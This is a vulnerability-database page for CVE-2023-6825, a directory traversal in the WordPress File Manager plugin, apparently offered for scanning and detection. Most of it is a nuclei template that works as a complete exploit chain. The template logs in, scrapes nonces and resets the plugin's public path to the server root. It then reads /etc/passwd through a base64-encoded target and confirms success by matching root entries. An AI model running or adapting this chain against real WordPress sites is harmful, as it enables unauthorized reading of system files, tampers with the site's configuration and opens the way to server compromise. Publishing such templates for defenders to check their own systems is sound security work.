Lucene search
K

WordPress File Manager <= 7.2.1 - Directory Traversal

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Critical WordPress File Manager directory traversal via target parameter exposes files and uploads.

Related
Refs
Code
id: CVE-2023-6825

info:
  name: WordPress File Manager <= 7.2.1 - Directory Traversal
  author: pussycat0x
  severity: critical
  description: |
    File Manager and File Manager Pro plugins for WordPress versions up to 7.2.1 and 8.3.4 contain a directory traversal caused by the 'target' parameter in mk_file_folder_manager_action_callback_shortcode, letting attackers read arbitrary files and upload files outside designated directories, exploit requires administrator privileges for free version and can be exploited by lower-level users in Pro version.
  impact: |
    Attackers can read sensitive files and upload files outside permitted directories, potentially leading to information disclosure and server compromise.
  remediation: |
    Update to the latest versions of the plugins, beyond 7.2.1 for free and 8.3.4 for Pro, or disable the plugins until patched.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804
    - https://plugins.trac.wordpress.org/changeset/3023403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.9
    cve-id: CVE-2023-6825
    epss-score: 0.06009
    epss-percentile: 0.92452
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: mndpsingh287
    product: file-manager
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-file-manager"
  tags: cve,cve2023,wordpress,wp-plugin,wp-file-manager,lfi

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "File Manager")'
          - 'compare_versions(version, "<= 7.2.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        public_path=%2F&wp_filemanager_root_nonce_field={{pref_nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp_file_manager_preferences&submit=Save+Changes

      - |
        GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA&_wpnonce={{fm_nonce}}

    redirects: true
    max-redirects: 3

    extractors:
      - type: regex
        name: pref_nonce
        part: body_2
        group: 1
        regex:
          - 'wp_filemanager_root_nonce_field"[^>]*value="([a-f0-9]+)"'
        internal: true

      - type: regex
        name: fm_nonce
        part: body_4
        group: 1
        regex:
          - '"nonce"\s*:\s*"([a-f0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_5 == 200'
          - 'regex("root:.*:0:0:", body_5)'
        condition: and
# digest: 4a0a004730450221008cc06a9ff001c8924ccf112f548392e1159d077d214ce7b166f3ae6950b2dabc022049c6a04aa3627769bc8a0d44f35a52c3bda72e6dda34bface88a8b2cfcef6e23:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Apr 2026 14:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.9
EPSS0.06009
SSVC
9